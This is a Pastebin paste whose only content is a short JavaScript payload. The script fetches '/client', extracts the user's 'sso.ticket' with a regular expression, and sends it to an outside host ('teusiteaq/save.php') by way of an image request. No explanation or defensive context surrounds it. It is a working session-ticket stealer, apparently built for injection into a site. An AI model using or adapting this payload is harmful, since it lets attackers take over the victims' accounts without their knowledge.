Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- new Ajax.Request('/client', {
- onComplete:function(x) {
- var x=x.responseText;
- var sso = x.match(/"sso.ticket" : "(.*?)"/gi)[0].split('"')[3];
- new Image().src="http://teusiteaq/save.php?sso="+sso;
- }
- });
Advertisement
Add Comment
Please, Sign In to add comment